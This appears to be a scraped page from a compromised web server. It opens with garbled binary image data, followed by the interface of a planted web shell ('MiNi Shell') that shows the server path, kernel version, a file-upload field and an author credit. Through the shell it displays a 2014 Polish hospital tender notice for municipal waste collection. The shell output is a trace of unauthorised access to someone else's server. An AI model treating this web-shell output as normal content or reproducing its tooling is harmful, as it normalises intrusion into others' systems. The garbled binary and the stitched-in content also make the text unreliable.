JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/137959-N-2014.html

<p class="kh_header"><b>Wysokie Mazowieckie: Usługa odbioru odpadów komunalnych    .</b><br>
<b>Numer ogłoszenia: 137959 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Ogólny w Wysokiem Mazowieckiem , ul. Szpitalna 5, 18-200 Wysokie Mazowieckie, woj. podlaskie, tel. 086 4775501, faks 086 2752047.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http/www./szpitalwysmaz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa odbioru odpadów komunalnych    ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są kompleksowe usługi polegające na  odbiorze i zagospodarowaniu odpadów 
    komunalnych o kodzie 20 03 01 wytworzonych  w siedzibie  Szpitala Ogólnego w Wysokiem Mazowieckiem 
    ul. Szpitalna 5 oraz dzierżawa pojemników do ich gromadzenia wg podanej ilości:
 - zapotrzebowanie na 5 szt pojemników PA 1100 na odpady komunalne o pojemności - 1100 l
 - średnia miesięczna ilość wywożonych pojemników - 52 szt
Usługi będące przedmiotem postępowania powinny być realizowane zgodnie z przepisami
Ustawy z dnia 14 grudnia 2012r - o odpadach
Ustawy z dnia 27 kwietnia 2001r - Prawo Ochrony Środowiska
2. Wszystkie środki używane do wykonywania usługi muszą posiadać niezbędne świadectwa rejestracji i atesty.
3.Przedmiot zamówienia obejmuje również stałą konserwację i sprawność techniczną pojemników w ramach 
   wykonywanej usługi, w tym: wymianę i naprawę uszkodzonych pojemników, utrzymanie ich w należytym stanie 
   sanitarnym, systematyczną dezynfekcję ( minimum raz w tygodniu), terminowe opróżnianie pojemników, 
   utrzymanie czystości wokół pojemników po usunięciu odpadów.
6.Informujemy, że w okresie 36 miesięcy Szpital Ogólny w Wysokiem Mazowieckiem wytwarza około 2 250 m3 
   odpadów komunalnych.

Dostarczone pojemniki muszą posiadać zamknięcia.  

Przedmiot zamówienia składa się z Załącznika nr 1 do SIWZ  . 


Zamawiający nie dopuszcza możliwości składania ofert częściowych . 

Oferent przystępujący do ww procedury winien przystąpić do całości zamówienia . Oferty cząstkowe będą odrzucone ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnią warunek wykazując, że wykonali / wykonują w ciągu 
    ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną 
    usługę zbliżoną zakresem rzeczowym  do przedmiotu zamówienia - załącznik nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają  środki transportu spełniające wymagania przewidziane przepisami dla transportu 
   odpadów - w ilości 2 szt. - załącznik nr 6 do SIWZ .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1)Formularz ofertowy - wypełniony i podpisany przez wykonawcę  - załącznik nr 4 
A.2)Formularz cenowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1 
A.3)Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych 
        - załącznik nr 2 . A.4)Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 
       Prawa zamówień publicznych - załącznik nr 3  A.5)Oświadczenie dotyczące grupy kapitałowej z art. 26 ust. 2d Prawa zamówień publicznych - załącznik nr 5
A.6)Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę o ile nie wynikają 
       z przepisów prawa lub z przedstawionych dokumentów rejestrowych 

B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust 1 
     Prawa zamówień publicznych wykonawca składa następujące dokumenty: 
B.1)Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, 
       jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do 
      wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem 
      terminu składania ofert.   C. W celu oceny spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt. 1) do 3) 
     ustawy Pzp, należy złożyć następujące dokumenty:  C.1)Oświadczenie o spełnieniu warunków udziału w postepowaniu z art. 22 ust. 1 Prawa Zamówień Publicznych         
       - załącznik nr 2 do SIWZ 
C.2)Wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w 
       okresie ostatnich trzech lat przed upływem terminu składania ofert  , a jeżeli okres prowadzenia działalności 
       jest krótszy - w tym okresie wraz z podaniem ich wartości , przedmiotu , dat wykonania i podmiotów  na 
       rzecz których usługi zostały wykonane , oraz załączeniem dowodów , czy zostały wykonane lub są 
       wykonywane należycie - załącznik nr 7.  C.3 )Wykaz środków transportu dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o
        podstawie do dysponowania tymi zasobami - minimum 2 szt. - Załącznik nr 6 do SIWZ . 
 D. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w  art. 22 ust. 1 pkt. 4) 
     ustawy Pzp, należy złożyć następujące dokumenty:  Nie dotyczy 



E. Postanowienia dotyczące składania dokumentów przez Wykonawców mających siedzibę lub miejsce 
     zamieszkania poza terytorium Rzeczypospolitej Polskiej  E.1)Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast
       dokumentów, o których mowa w pkt.B.1) C.1)składa dokument lub dokumenty, wystawione w kraju, w 
       którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed 
    upływem terminu składania ofert. 
E.2)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentów, wskazanych w pkt. E.1), zastępuje się je dokumentem 
       zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, 
       złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
       gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę 
       lub miejsce zamieszkania, lub przed notariuszem - wystawionych nie wcześniej niż w terminach określonych 
       w pkt. E.1).  E.3)W przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których
       mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej 
       Polskiej, wykonawca, zamiast dokumentu, o którym mowa w pkt.B.4), składa w odniesieniu do nich 
       zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące 
       niekaralności tych  osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie 
       wcześniej niż 6 miesięcy  przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu 
       zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym
       oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu 
       zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.  E.4)W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub 
       miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do 
       właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma 
       siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących 
       przedłożonego dokumentu.  F. W przypadku, kiedy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia 
     (konsorcjum /spółka cywilna), musi ona spełniać następujące warunki:  F.1)Oferta winna być podpisana przez ustanowionego pełnomocnika do reprezentowania w postępowaniu lub do 
       reprezentowania w postępowaniu i zawarcia umowy. F.2)Stosowne pełnomocnictwo  upoważnienie wymaga podpisu prawnie upoważnionych przedstawicieli każdego 
       z wykonawców występujących wspólnie - należy załączyć do oferty. Pełnomocnictwo należy złożyć w
       formie oryginału lub notarialnie poświadczonej kopii. F.3)Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. VI dla każdego wykonawcy z osobna, 
      pozostałe dokumenty składane są wspólnie.  G. W celu potwierdzenia, że oferowane dostawy, usługi, lub roboty budowlane odpowiadają wymaganiom 
     określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć 
     następujące dokumenty: 
Nie dotyczy  
 H. Postanowienia dotyczące składanych dokumentów  H.1)Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za 
        zgodność z oryginałem przez wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem 
        za zgodność z oryginałem. H.2)Oferta, wszystkie wymagane załączniki, składane dokumenty oraz oświadczenia podpisane przez 
       upoważnionego przedstawiciela wykonawcy wymagają załączenia właściwego pełnomocnictwa lub 
       umocowania prawnego. H.3)Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.. H.4)Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu 
       wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co 
       do jej prawdziwości. H.5)W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku 
       podmiotów, o których mowa w pkt. H.6), kopie dokumentów dotyczących każdego z tych podmiotów winny 
       być poświadczane za zgodność z oryginałem przez te podmioty. H.6)Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C i D polega na zasobach innych 
       podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, zobowiązany jest wykazać, że w 
       stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia 
       poprzez  złożenie razem z ofertą dokumentów wymienionych w pkt. A.3) oraz pkt. od B.1) do B 5) 
      dotyczących każdego z tych podmiotów. H.7)Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C i D polega na zasobach innych 
       podmiotów w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu 
       niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi 
       podmiotami gwarantuje rzeczywisty dostęp do ich zasobów do oferty należy dołączyć dokumenty dotyczące:        zakresu dostępnych wykonawcy zasobów innego podmiotu,        sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,        charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,        zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wynagrodzenie , o którym mowa  w § 5 ust. 1 Zamawiający zastrzega sobie niezmienność cen przez okres trwania umowy . Ceny mogą ulec zmianie w przypadku zmiany stawki VAT z chwilą wejścia w życie odpowiedniego aktu prawnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//szpitalwysmaz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Ogólny , ul. Szpitalna 5 , 18 - 200 Wysokie Mazowieckie - pokój 110 lub za zaliczeniem pocztowym - cena 50,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 10:00, miejsce: Szpital Ogólny , ul. Szpitalna 5 , 18 - 200 Wysokie Mazowieckie , pokój 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com